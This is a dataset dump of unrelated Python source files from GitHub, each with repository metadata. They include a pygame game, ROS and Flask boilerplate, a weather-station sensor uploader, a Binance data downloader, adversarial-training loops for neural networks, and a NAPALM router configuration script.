pg.K_w:\n\t\t\t\t\tif playerY - playerSpeed < window.bottom // 2:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tplayerY -= playerSpeed\n\n\t\t\t\tif event.key == pg.K_s:\n\t\t\t\t\tif playerY + 100 + playerSpeed > (window.bottom // 1.5) and not wideScreen:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\telif playerY + 100 + playerSpeed > window.bottom and wideScreen:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tplayerY += playerSpeed\n\n\t\t\t\tif event.key == pg.K_j:\n\t\t\t\t\tif shotCycle >= 120 and remBullets >= 1:\n\t\t\t\t\t\teffects[0].play()\n\t\t\t\t\t\tremBullets -= 1\n\t\t\t\t\t\tif wideScreen:\n\t\t\t\t\t\t\tbullets.append(Bullet(rect1.left, 
rect1.y - 5, 0))\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tbullets.append(Bullet(rect1.left, rect1.y - 5, 1))\n\t\t\t\t\t\tshotCycle = 0\n\n\t\t\t\t# DEBUGGING KEYS\n\t\t\t\tif event.key == pg.K_r:\n\t\t\t\t\tmain()\n\t\t\t\t\t\t\n\t\tmoveCycle += 5\n\t\tshotCycle += 5\n\t\t\t\t\t\n\t\tpg.draw.rect(mScrn, (255, 0, 0), rect1)\n\t\t\n\t\tif remBullets == 0 and len(bullets) <= 0 and len(enemyBlocks) > 0:\n\t\t\tmScrn.fill((0,0,0))\n\t\t\tgameOverDisp(mScrn)\n\t\t\n\t\tpg.display.flip()\n\t\t\n\t\tmScrn.fill((0,0,0))\n\n\nmain()\n\npg.quit()\n\t","repo_name":"sfernandez131/PyShooter","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7325616336","text":"#!/usr/bin/env python3\nimport rospy\nfrom std_msgs.msg import Int64\n\n\ndef start():\n rospy.init_node('talk.py')\n\n #create vars pubs and subs\n pubTosub = rospy.Publisher('NUM', Int64, queue_size = 10)\n\n global num\n num = 0\n\n rate = rospy.Rate(10) #10 hz\n\n while not rospy.is_shutdown():\n #do some stuff\n \n pubTosub.publish(num)\n num = num + 1\n\n\n rate.sleep()\n\n rospy.spin()\n\n\n\nif __name__ == '__main__':\n start()","repo_name":"jmorrow10/Tutorial-Code","sub_path":"catkin_ws/src/tutorials/src/talk.py","file_name":"talk.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"31828110711","text":"import argparse\nimport json\nimport os\nimport pathlib\nimport re\nimport shutil\nimport sys\nimport time\nimport zipfile\n\nimport requests\n\nEMIL_BASE_URL = \"https://historic-builds.emulation.cloud/emil\"\nOUTPUT_DIR = \"/app/output\"\n# OUTPUT_DIR = \"output\"\n\n\ndef main():\n # parser = argparse.ArgumentParser(\n # \"Wrapper for the EAAS Workflow API, automatically starts a container based tool and retrieves the output!\")\n #\n # parser.add_argument(\"environmentId\", type=str, help=\"The Id of the environment.\")\n # parser.add_argument(\"-f\", \"--files\", nargs=\"*\")\n # parser.add_argument(\"-p\", \"--params\", nargs=\"*\")\n #\n # args = parser.parse_args()\n # env_id, files, params = args.environmentId, args.files, args.params\n #\n # print(\"Env ID\", env_id)\n # print(\"Data\", files)\n # print(\"Params\", params)\n\n # args = sys.argv\n # print(args)\n # env_id = args[1]\n #\n # files = []\n # params = {}\n #\n # index = 0\n # for i, file in enumerate(args[3:]):\n # if file in [\"-p\", \"--params\"]:\n # index = i + 4\n # break\n # files.append(file)\n #\n # for i2, param in enumerate(args[index:]):\n # params[i2] = param\n #\n # print(\"Env ID\", env_id)\n # print(\"Data\", files)\n # print(\"Params\", params)\n\n json_data = {}\n\n with open(\"config.json\") as config:\n json_data = json.load(config)\n\n files = json_data[\"inputFiles\"]\n input_files = {}\n for file_path in files:\n\n try:\n file = open(file_path, \"rb\")\n except Exception as e:\n print(\"Could not find file: \" + file_path)\n print(e)\n exit(1)\n\n req = requests.post(EMIL_BASE_URL + \"/upload?access_token=undefined\", files={\"file\": file})\n\n print(\"Got status:\", req.status_code, \"for file \", file_path)\n print(\"Got response: \", req.json())\n input_files[pathlib.Path(file_path).name] = req.json()[\"uploads\"][0]\n\n print(\"Starting Workflow!\")\n\n json_data[\"inputFiles\"] = input_files\n\n index = len(json_data[\"arguments\"])\n\n for key, val in json_data[\"unordered\"].items():\n # not specified or 
flags set to false\n        if val in [\"null\", \"false\"]:\n            continue\n        # flags set to true\n        elif val == \"true\":\n            json_data[\"arguments\"][str(index)] = key\n            index += 1\n        # other arguments (lists/arrays not supported)\n        else:\n            json_data[\"arguments\"][str(index)] = key\n            json_data[\"arguments\"][str(index + 1)] = val\n            index += 2\n\n    print(\"Sending Json: \", json_data)\n\n    # TODO: add status checks everywhere; if the status is not right: raise an error and stop\n    wf_response = requests.post(EMIL_BASE_URL + \"/workflow/api/v1/workflow\",\n                                json=json_data)\n    wait_queue_url = wf_response.json()[\"waitQueueUrl\"]\n\n    while True:\n\n        wait_queue_response = requests.get(wait_queue_url)\n        q_json = wait_queue_response.json()\n\n        if not q_json[\"isDone\"]:\n            print(\"Tool is still running.\")\n            time.sleep(5)\n        else:\n            print(\"Tool is done!\")\n            result_url = q_json[\"resultUrl\"]\n            break\n\n    result_response = requests.get(result_url)\n    blobstore_url = result_response.json()[\"url\"]\n    print(\"Blobstore URL: \" + blobstore_url)\n\n    blobstore_response = requests.get(blobstore_url)\n\n    with open(OUTPUT_DIR + \"/files.zip\", \"wb\") as f:\n        f.write(blobstore_response.content)\n\n    with zipfile.ZipFile(OUTPUT_DIR + \"/files.zip\", \"r\") as zip_ref:\n        zip_ref.extractall(OUTPUT_DIR)\n\n    os.remove(OUTPUT_DIR + \"/files.zip\")\n\n    # regex = re.compile(\"container-log-[a-z0-9\\-]*\\.log\")\n    #\n    print(\"Files in output: \")\n    for root, dirs, files in os.walk(OUTPUT_DIR):\n        for file in files:\n            print(file)\n\n    print(\"Done! Files stored at: \" + OUTPUT_DIR)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"Aeolic/eaas-workflow-wrapper","sub_path":"wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":3931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35868845973","text":"import time\nimport board\nimport neopixel\nimport busio\nimport analogio\nfrom simpleio import map_range\nfrom digitalio import DigitalInOut\n\nfrom adafruit_esp32spi import adafruit_esp32spi, adafruit_esp32spi_wifimanager\nfrom adafruit_io.adafruit_io import IO_HTTP, AdafruitIO_RequestError\n\n# sensor libs\nimport adafruit_veml6075\nimport adafruit_sgp30\nfrom adafruit_bme280 import basic as adafruit_bme280\n\n# weatherstation graphics helper\nimport weatherstation_helper\n\n# rate at which to refresh the pyportal and sensors, in seconds\nPYPORTAL_REFRESH = 30\n\n# anemometer defaults\nanemometer_min_volts = 0.4\nanemometer_max_volts = 2.0\nmin_wind_speed = 0.0\nmax_wind_speed = 32.4\n\n# Get wifi details and more from a secrets.py file\ntry:\n    from secrets import secrets\nexcept ImportError:\n    print(\"WiFi secrets are kept in secrets.py, please add them there!\")\n    raise\n\n# PyPortal ESP32 Setup\nesp32_cs = DigitalInOut(board.ESP_CS)\nesp32_ready = DigitalInOut(board.ESP_BUSY)\nesp32_reset = DigitalInOut(board.ESP_RESET)\nspi = busio.SPI(board.SCK, board.MOSI, board.MISO)\nesp = adafruit_esp32spi.ESP_SPIcontrol(spi, esp32_cs, esp32_ready, esp32_reset)\nstatus_light = neopixel.NeoPixel(board.NEOPIXEL, 1, brightness=0.2)\nwifi = adafruit_esp32spi_wifimanager.ESPSPI_WiFiManager(esp, secrets, status_light)\n\n# Set your Adafruit IO Username and Key in secrets.py\n# (visit io.adafruit.com if you need to create an account,\n# or if you need your Adafruit IO key.)\nADAFRUIT_IO_USER = secrets['aio_username']\nADAFRUIT_IO_KEY = secrets['aio_key']\n\n# Create an instance of the Adafruit IO HTTP client\nio = IO_HTTP(ADAFRUIT_IO_USER, ADAFRUIT_IO_KEY, wifi)\n\n# create an i2c 
object\ni2c = busio.I2C(board.SCL, board.SDA)\n\n# instantiate the sensor objects\nveml = adafruit_veml6075.VEML6075(i2c, integration_time=100)\nsgp30 = adafruit_sgp30.Adafruit_SGP30(i2c)\nbme280 = adafruit_bme280.Adafruit_BME280_I2C(i2c)\n# change this to match the location's pressure (hPa) at sea level\nbme280.sea_level_pressure = 1013.25\n\n# init. the graphics helper\ngfx = weatherstation_helper.WeatherStation_GFX()\n\n# init. the ADC\nadc = analogio.AnalogIn(board.D4)\n\n# Set up Adafruit IO Feeds\nprint('Getting Group data from Adafruit IO...')\nstation_group = io.get_group('weatherstation')\nfeed_list = station_group['feeds']\naltitude_feed = feed_list[0]\neco2_feed = feed_list[1]\nhumidity_feed = feed_list[2]\npressure_feed = feed_list[3]\ntemperature_feed = feed_list[4]\ntvoc_feed = feed_list[5]\nuv_index_feed = feed_list[6]\nwind_speed_feed = feed_list[7]\n\ndef adc_to_wind_speed(val):\n \"\"\"Returns anemometer wind speed, in m/s.\n :param int val: ADC value\n \"\"\"\n voltage_val = val / 65535 * 3.3\n return map_range(voltage_val, 0.4, 2, 0, 32.4)\n\ndef send_to_io():\n # handle sending sensor data to Adafruit IO\n io.send_data(uv_index_feed['key'], uv_index)\n io.send_data(wind_speed_feed['key'], wind_speed)\n io.send_data(temperature_feed['key'], bme280_data[0])\n io.send_data(humidity_feed['key'], bme280_data[1])\n io.send_data(pressure_feed['key'], bme280_data[2])\n io.send_data(altitude_feed['key'], bme280_data[3])\n io.send_data(eco2_feed['key'], sgp_data[0])\n io.send_data(tvoc_feed['key'], sgp_data[1])\n\nwhile True:\n print('obtaining sensor data...')\n # Get uv index from veml6075\n uv_index = veml.uv_index\n # Get eco2, tvoc from sgp30\n eCO2, TVOC = sgp30.iaq_measure()\n sgp_data = [eCO2, TVOC]\n # Store bme280 data as a list\n bme280_data = [bme280.temperature, bme280.humidity,\n bme280.pressure, bme280.altitude]\n # Get wind speed\n wind_speed = adc_to_wind_speed(adc.value)\n # Display sensor data on PyPortal using the gfx helper\n print('displaying sensor data...')\n gfx.display_data(uv_index, bme280_data,\n sgp_data, wind_speed)\n print('sensor data displayed!')\n try:\n try:\n print('Sending data to Adafruit IO...')\n gfx.display_io_status('Sending data to IO...')\n send_to_io()\n gfx.display_io_status('Data Sent!')\n print('Data sent!')\n except AdafruitIO_RequestError as e:\n raise AdafruitIO_RequestError('IO Error: ', e)\n except (ValueError, RuntimeError, ConnectionError, OSError) as e:\n print(\"Failed to get data, retrying\\n\", e)\n wifi.reset()\n continue\n time.sleep(PYPORTAL_REFRESH)\n","repo_name":"adafruit/Adafruit_Learning_System_Guides","sub_path":"pyportal_weather_station/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":4366,"program_lang":"python","lang":"en","doc_type":"code","stars":913,"dataset":"github-code","pt":"5"} +{"seq_id":"36073560164","text":"\nimport asyncio\nimport logging\nfrom dataclasses import asdict\nfrom typing import TYPE_CHECKING, Any\n\nimport socketio\nfrom dacite import from_dict\nfrom fastapi.encoders import jsonable_encoder\n\nfrom ..data_classes import TrainingOut\nfrom ..data_classes.socket_response import SocketResponse\n\nif TYPE_CHECKING:\n from .trainer_logic import TrainerLogic\n\n\nasync def try_sync_model(trainer: 'TrainerLogic', trainer_node_uuid: str, sio_client: socketio.AsyncClient):\n try:\n model = trainer.get_new_model()\n except Exception as exc:\n logging.exception('error while getting new model')\n raise Exception(f'Could not get new model: {str(exc)}') from exc\n 
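# model is None when the trainer produced nothing new; then there is nothing to sync\n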
    logging.debug(f'new model {model}')\n\n    if model:\n        response = await sync_model(trainer, trainer_node_uuid, sio_client, model)\n\n        if not response.success:\n            error_msg = f'Error for update_training: Response from loop was : {asdict(response)}'\n            logging.error(error_msg)\n            raise Exception(error_msg)\n\n\nasync def sync_model(trainer, trainer_node_uuid, sio_client, model):\n    current_training = trainer.training\n    new_training = TrainingOut(\n        trainer_id=trainer_node_uuid,\n        confusion_matrix=model.confusion_matrix,\n        train_image_count=current_training.data.train_image_count(),\n        test_image_count=current_training.data.test_image_count(),\n        hyperparameters=trainer.hyperparameters)\n\n    await asyncio.sleep(0.1)  # NOTE needed for tests.\n\n    result = await sio_client.call('update_training', (current_training.context.organization, current_training.context.project, jsonable_encoder(new_training)))\n    response = from_dict(data_class=SocketResponse, data=result)\n\n    if response.success:\n        logging.info(f'successfully updated training {asdict(new_training)}')\n        trainer.on_model_published(model)\n    return response\n","repo_name":"zauberzeug/learning_loop_node","sub_path":"learning_loop_node/trainer/training_syncronizer.py","file_name":"training_syncronizer.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"32193628001","text":"#\n# Given a rows x cols screen and a sentence represented as a list of strings, \n# return the number of times the given sentence can be fitted on the screen.\n# The order of words in the sentence must remain unchanged, \n# and a word cannot be split into two lines. A single space must separate two consecutive words in a line.\n\n\n# 359. Logger Rate Limiter\n# Runtime: 32 ms, faster than 95.79% of Python3 online submissions for Bulls and Cows.\n# Memory Usage: 14.3 MB, less than 31.99% of Python3 online submissions for Bulls and Cows.\n\nfrom collections import Counter\n\nclass Solution1:\n    def getHint(self, secret: str, guess: str) -> str:\n        cows = bulls = 0\n        for i in range(len(secret)):\n            if guess[i] == secret[i]:\n                bulls += 1\n        secret_cnt = Counter(secret)\n        guess_cnt = Counter(guess)\n        guess_cnt_keys = guess_cnt.keys()\n        for key in secret_cnt.keys():\n            if key in guess_cnt_keys:\n                cows += min(guess_cnt[key], secret_cnt[key])\n\n        cows -= bulls\n        return \"{}A{}B\".format(bulls, cows)\n","repo_name":"sandeulsandeul/programmers_for_codingTest","sub_path":"leetcode/Sentence Screen Fitting.py","file_name":"Sentence Screen Fitting.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25159019856","text":"# write a program that will censor the listed words in another file with ######\n\nwords = [\"Donkey\", \"Mad\", \"ass\"]\n\nwith open(\"sample.txt\", \"r\") as f:\n    content = f.read() # file content is stored in the content variable\n\nfor word in words:\n    content = content.replace(word, \"@#$%^&\") # replace each censored word with the mask string\n\nwith open(\"sample.txt\", \"w\") as f:\n    f.write(content) # write the censored content back to the file\n\n","repo_name":"sushan2556/all-programs","sub_path":"sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"10854769913","text":"from pygame import Rect\n\n\n
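# A Frame couples a collision rect with its sprite source rect and a per-frame\n# delay; an Action steps through its Frames and holds the last one once done.\n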
class Frame(object):\n    def __init__(self, col: Rect, src: Rect, delay: int):\n        self.collision: Rect = col\n        self.src: Rect = src\n        self.delay = delay\n\n\nclass Action(object):\n    def __init__(self, frames: list):\n        self.tick: int = 0\n        self.index: int = 0\n        self.frames: list = frames\n\n    def next_frame(self) -> Frame:\n        frame: Frame = self.frames[self.index]\n        if self.tick > frame.delay:\n            self.tick = 0\n            self.index += 1\n            if self.index >= len(self.frames):\n                self.index = len(self.frames) - 1\n        self.tick += 1\n        return frame\n\n    def reset(self) -> None:\n        self.tick = 0\n        self.index = 0\n\n    def is_completed(self) -> bool:\n        return self.index == (len(self.frames) - 1)\n","repo_name":"akDeveloper/snake-game-clone","sub_path":"action.py","file_name":"action.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"22934403307","text":"from flask import Flask\nfrom flask_login import LoginManager\n\nfrom .config import config\nfrom .models import db, User\n\ndef create_app():\n    app = Flask(__name__)\n    app.config.update(config.to_flask_config())\n\n    db.init_app(app)\n    with app.app_context():\n        db.create_all()\n\n    login_manager = LoginManager()\n    login_manager.login_view = 'auth.login'\n    login_manager.init_app(app)\n\n    @login_manager.user_loader\n    def load_user(user_id):\n        return User.query.get(int(user_id))\n\n    from .auth import auth as auth_blueprint\n    app.register_blueprint(auth_blueprint)\n\n    from .drive import drive as drive_blueprint\n    app.register_blueprint(drive_blueprint)\n\n    return app","repo_name":"ToniIvars/localdrive-flask","sub_path":"drive/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"21700376564","text":"import sys\n\nfrom django.forms.widgets import Input\nfrom django.utils.safestring import mark_safe\nfrom django.forms.widgets import MultiWidget, DateInput, TimeInput\nfrom time import strftime\n\n# Taken from https://github.com/stholmes/django-bootstrap-datetime-widgets/blob/master/widgets.py\nclass BootstrapSplitDateTimeWidget(MultiWidget):\n\n    def __init__(self, attrs=None, date_format=None, time_format=None):\n        date_class = attrs['date_class']\n        time_class = attrs['time_class']\n        date_default = attrs['date_default']\n        time_default = attrs['time_default']\n        del attrs['date_class']\n        del attrs['time_class']\n        del attrs['date_default']\n        del attrs['time_default']\n\n        time_attrs = attrs.copy()\n        time_attrs['class'] = time_class\n        time_attrs['value'] = time_default\n\n        date_attrs = attrs.copy()\n        date_attrs['class'] = date_class\n        date_attrs['value'] = date_default\n\n        sys.stderr.write(\"time format is %s\" % time_format)\n        widgets = (DateInput(attrs=date_attrs, format=date_format), TimeInput(attrs=time_attrs, format=time_format))\n\n        super(BootstrapSplitDateTimeWidget, self).__init__(widgets, attrs)\n\n    def decompress(self, value):\n        if value:\n            d = strftime(\"%Y-%m-%d\", value.timetuple())\n            hour = strftime(\"%H\", value.timetuple())\n            minute = strftime(\"%M\", value.timetuple())\n            meridian = strftime(\"%p\", value.timetuple())\n            t = (d, hour+\":\"+minute, meridian)\n\n            sys.stderr.write(\"time tuple is %s\" % str(t))\n            return t\n        else:\n            return (None, None, None)\n\n
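    # MultiWidget calls format_output with the already-rendered date and time\n    # inputs, in the order the widgets tuple was built in __init__.\n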
    def format_output(self, rendered_widgets):\n        \"\"\"\n        Given a list of rendered widgets (as strings), it inserts an HTML\n        linebreak between them.\n\n        Returns a Unicode string representing the HTML for the whole lot.\n        \"\"\"\n        return \"Date: %s<br/>
    Time: %s\" % (rendered_widgets[0], rendered_widgets[1])\n\n\nclass TimePickerWidget(Input):\n\n input_type = 'text'\n\n def render(self, name, value, attrs=None):\n attrs = {'class': 'timepicker-default input-timepicker'}\n append_text = self.attrs.get('text', '')\n return mark_safe(u'%s%s' % (super(TimePickerWidget, self).render(name, value, attrs), append_text))\n","repo_name":"llovett/obietaxi","sub_path":"obietaxi/taxi/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"26889607146","text":"def counting_sort(arr):\n max_num = max(arr)\n count = [0] * (max_num + 1)\n\n for num in arr:\n count[num] += 1\n\n sorted_arr = []\n for i in range(max_num + 1):\n for j in range(count[i]):\n sorted_arr.append(i)\n\n return sorted_arr\n\n\narr = [10, 100, 3, 1]\n\nprint(counting_sort(arr))","repo_name":"fudoge/BOJ-practice","sub_path":"algorithm/counting_sort.py","file_name":"counting_sort.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7682695011","text":"import click\nimport pandas as pd\nfrom datetime import date, timedelta, datetime\nfrom binance import Client\n\n@click.command()\n@click.option('--num_assets', default=5, help='Enter the number of assets to return',type=int)\n@click.option('--day', default=None, help='Enter the reference date from which data will be retrieved in YYYY-MM-DD format. Otherwise today will be taken.',type=str)\n@click.option('--look_back', default=30, help='Days to look back from refereence date',type=int)\ndef get_binance_data(num_assets, day = None, look_back = 0):\n \"\"\" \n Obtains historic data from a list of assets using Binance's API and stores it on a CSV file under data folder\n \"\"\"\n client = Client()\n info = client.get_all_tickers()\n print(info)\n \n # Time frame\n if day:\n today = datetime.strptime(day, '%Y-%m-%d') - timedelta(days=look_back)\n else:\n today = date.today() - timedelta(days=look_back)\n yearago = today.replace(year = today.year -1).strftime(\"%Y.%m.%d\")\n today = today.strftime(\"%Y.%m.%d\")\n timeframe=\"1d\"\n\n # Main dataframe structure\n df = pd.DataFrame(columns=[\"Asset\",\"Open time\",\"Open\",\"High\",\"Low\",\"Close\",\"Volume\", \"Closing time\",\"Quote asset vol\", \"Num traders\", \"Taker buy base asset vol\", \"Taker buy quote asset vol\",\"To be ignored\"])\n\n # Iterate for each asset\n an = 0\n for tick in info:\n asset = tick[\"symbol\"]\n # We will filter the assets to work with\n if an < num_assets:\n data = client.get_historical_klines(asset, timeframe, yearago, today)\n if len(data) >= 365:\n df_tmp = pd.DataFrame(data, columns=[\"Open time\",\"Open\",\"High\",\"Low\",\"Close\",\"Volume\", \"Closing time\",\"Quote asset vol\", \"Num traders\", \"Taker buy base asset vol\", \"Taker buy quote asset vol\",\"To be ignored\"])\n df_tmp[\"Asset\"] = asset\n df = pd.concat([df, df_tmp])\n an += 1\n else:\n break\n\n # Write to file under data folder \n df.to_csv(\"data/binance_data.csv\")\n\n# Entrypoint\nif __name__ == \"__main__\":\n get_binance_data()","repo_name":"PacktPublishing/Financial-Modeling-using-Quantum-Computing","sub_path":"retrieve_data.py","file_name":"retrieve_data.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"5"} 
+{"seq_id":"17458975553","text":"\"\"\"\nDescription: Training and testing functions for neural models\n\nfunctions:\n train: Performs a single training epoch (if attack_args is present adversarial training)\n test: Evaluates model by computing accuracy (if attack_args is present adversarial testing)\n\"\"\"\n\nfrom tqdm import tqdm\nfrom apex import amp\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n__all__ = ['adversarial_epoch', 'adversarial_test']\n\n\ndef adversarial_epoch(model, train_loader, optimizer, scheduler=None, adversarial_args=None):\n \"\"\"\n Description: Single epoch,\n if adversarial args are present then adversarial training.\n Input :\n model : Neural Network (torch.nn.Module)\n train_loader : Data loader (torch.utils.data.DataLoader)\n optimizer : Optimizer (torch.nn.optimizer)\n scheduler: Scheduler (Optional) (torch.optim.lr_scheduler.CyclicLR)\n adversarial_args :\n attack: (deepillusion.torchattacks)\n attack_args:\n attack arguments for given attack except \"x\" and \"y_true\"\n Output:\n train_loss : Train loss (float)\n train_accuracy : Train accuracy (float)\n \"\"\"\n\n model.train()\n\n device = model.parameters().__next__().device\n\n train_loss = 0\n train_correct = 0\n for data, target in train_loader:\n\n data, target = data.to(device), target.to(device)\n\n # Adversary\n if adversarial_args and adversarial_args[\"attack\"]:\n adversarial_args[\"attack_args\"][\"net\"] = model\n adversarial_args[\"attack_args\"][\"x\"] = data\n adversarial_args[\"attack_args\"][\"y_true\"] = target\n perturbs = adversarial_args['attack'](**adversarial_args[\"attack_args\"])\n data += perturbs\n\n optimizer.zero_grad()\n output = model(data)\n cross_ent = nn.CrossEntropyLoss()\n loss = cross_ent(output, target)\n with amp.scale_loss(loss, optimizer) as scaled_loss:\n scaled_loss.backward()\n optimizer.step()\n if scheduler:\n scheduler.step()\n\n train_loss += loss.item() * data.size(0)\n pred_adv = output.argmax(dim=1, keepdim=True)\n train_correct += pred_adv.eq(target.view_as(pred_adv)).sum().item()\n\n train_size = len(train_loader.dataset)\n\n return train_loss/train_size, train_correct/train_size\n\n\ndef adversarial_test(model, test_loader, adversarial_args=None, verbose=False):\n \"\"\"\n Description: Evaluate model with test dataset,\n if adversarial args are present then adversarially perturbed test set.\n Input :\n model : Neural Network (torch.nn.Module)\n test_loader : Data loader (torch.utils.data.DataLoader)\n adversarial_args : (dict)\n attack: (deepillusion.torchattacks)\n attack_args: (dict)\n attack arguments for given attack except \"x\" and \"y_true\"\n verbose: Verbosity (Bool)\n Output:\n train_loss : Train loss (float)\n train_accuracy : Train accuracy (float)\n \"\"\"\n\n device = model.parameters().__next__().device\n\n model.eval()\n\n test_loss = 0\n test_correct = 0\n if verbose:\n iter_test_loader = tqdm(\n iterable=test_loader,\n unit=\"batch\",\n leave=False)\n else:\n iter_test_loader = test_loader\n\n for data, target in iter_test_loader:\n\n data, target = data.to(device), target.to(device)\n\n if adversarial_args and adversarial_args[\"attack\"]:\n adversarial_args[\"attack_args\"][\"net\"] = model\n adversarial_args[\"attack_args\"][\"x\"] = data\n adversarial_args[\"attack_args\"][\"y_true\"] = target\n perturbs = adversarial_args['attack'](**adversarial_args[\"attack_args\"])\n data += perturbs\n # breakpoint()\n\n output = model(data)\n\n cross_ent = nn.CrossEntropyLoss()\n test_loss += cross_ent(output, 
target).item() * data.size(0)\n\n        pred = output.argmax(dim=1, keepdim=True)\n        test_correct += pred.eq(target.view_as(pred)).sum().item()\n\n    test_size = len(test_loader.dataset)\n\n    return test_loss/test_size, test_correct/test_size\n","repo_name":"metehancekic/deep-illusion","sub_path":"deepillusion/torchdefenses/amp/_adversarial_train.py","file_name":"_adversarial_train.py","file_ext":"py","file_size_in_byte":4368,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"5"} +{"seq_id":"19129067433","text":"from collections import defaultdict\nfrom typing import List\n\n\nclass Solution:\n    # O(N) time and space\n    def restoreArray(self, adjacentPairs: List[List[int]]) -> List[int]:\n        graph = defaultdict(list)\n        count = defaultdict(int)\n\n        for a, b in adjacentPairs:\n            graph[a].append(b)\n            graph[b].append(a)\n            count[a] += 1\n            count[b] += 1\n\n        def dfs(cur):\n            if cur in visited:\n                return\n            visited.add(cur)\n            res.append(cur)\n            for nbr in graph[cur]:\n                if nbr not in visited:\n                    count[nbr] -= 1\n                    dfs(nbr)\n\n        visited = set()\n        res = []\n        for num in count:\n            if count[num] < 2:\n                dfs(num)\n        return res\n","repo_name":"Semeriuss/Data-Structures-and-Algorithms","sub_path":"squid_game_a2sv/round_2/day_8/1743. restore_array.py","file_name":"1743. restore_array.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"30504525893","text":"from napalm import get_network_driver\nimport json\n\ndriver = get_network_driver('ios')\noptional_args = {'secret': 'cisco'}\nios = driver('10.1.1.10', 'u1', 'cisco', optional_args=optional_args)\nios.open()\nios.load_replace_candidate(filename='r10-config.txt')\ndiff = ios.compare_config()\nprint(diff)\nif len(diff):\n    print('applying changes')\n    ios.commit_config()\nelse:\n    print('no change')\n    ios.discard_config()\n\nios.close()","repo_name":"5gnext/python","sub_path":"napalm-config-mgmt.py","file_name":"napalm-config-mgmt.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24835364335","text":"from builtins import object\nclass GnrCustomWebPage(object):\n    css_theme = 'textmate'\n\n    def main_root(self, root, bpath='', **kwargs):\n        self.createCss(root)\n        root.data('gnr.windowTitle', 'Database Structure')\n        root.dataRemote('_dev.dbstruct', 'app.dbStructure')\n        bc = root.borderContainer(height='100%', font_family='monaco')\n        self.topPane(bc.contentPane(region='top', _class='tm_top'))\n        tc = bc.tabContainer(region='center', margin='6px', background_color='white', font_size='.9em')\n        for pkg in list(self.db.packages.values()):\n            if pkg['tables']:\n                self.packagePane(tc.borderContainer(title=pkg.name,\n                                                    datapath='packages.%s' % pkg.name), pkg)\n\n    def topPane(self, pane):\n        top = pane.div()\n        top.div('Genropy', font_size='1.7em', color='white', margin='10px')\n\n    def packagePane(self, bc, pkg):\n        center = bc.contentPane(region='center', splitter=True, background_color='white')\n        for table in list(pkg['tables'].values()):\n            center.dataRemote('.tree.%s' % table.name, 'relationExplorer', table=table.fullname, dosort=False)\n        center.tree(storepath='.tree', persist=False,\n                    inspect='shift', #labelAttribute='label',\n                    _class='fieldsTree',\n                    hideValues=True,\n                    margin='6px',\n                    onDrag=self.onDrag(),\n                    draggable=True,\n                    dragClass='draggedItem',\n                    onChecked=True,\n                    selected_fieldpath='.selpath',\n                    getLabelClass=\"\"\"if (!node.attr.fieldpath && 
node.attr.table){return \"tableTreeNode\"}\n else if(node.attr.relation_path){return \"aliasColumnTreeNode\"}\n else if(node.attr.sql_formula){return \"formulaColumnTreeNode\"}\"\"\",\n getIconClass=\"\"\"if(node.attr.dtype){return \"icnDtype_\"+node.attr.dtype}\n else {return opened?'dijitFolderOpened':'dijitFolderClosed'}\"\"\")\n\n\n def createCss(self, pane):\n pane.css('.tm_top', 'background-color:#801f78;')\n pane.css('#mainWindow', 'background-color:white;')\n pane.css('.tundra .dijitTreeContent', 'padding-top:0;min-height:17px;')\n pane.css('.tundra .dijitTreeExpando', 'height:16px;')\n\n def onDrag(self):\n return \"\"\"var modifiers=dragInfo.modifiers;\n var mode= (modifiers=='Shift') ? 'r.fieldcell':(modifiers=='Meta') ? 'fb.field':''\n var children=treeItem.getValue()\n if(!children){\n var fieldpath=treeItem.attr.fieldpath;\n dragValues['text/plain']=mode?mode+'(\"'+fieldpath+'\")':fieldpath;\n return\n }\n var cb;\n cb=function(n){\n var fieldpath=n.attr.fieldpath\n return ' '+(mode?mode+'(\"'+fieldpath+'\")':fieldpath);\n };\n result=[];\n result.push('')\n children.forEach(function(n){if (n.attr.checked){result.push(cb(n));}},'static');\n result.push('')\n dragValues['text/plain']= result.join(_lf); \n 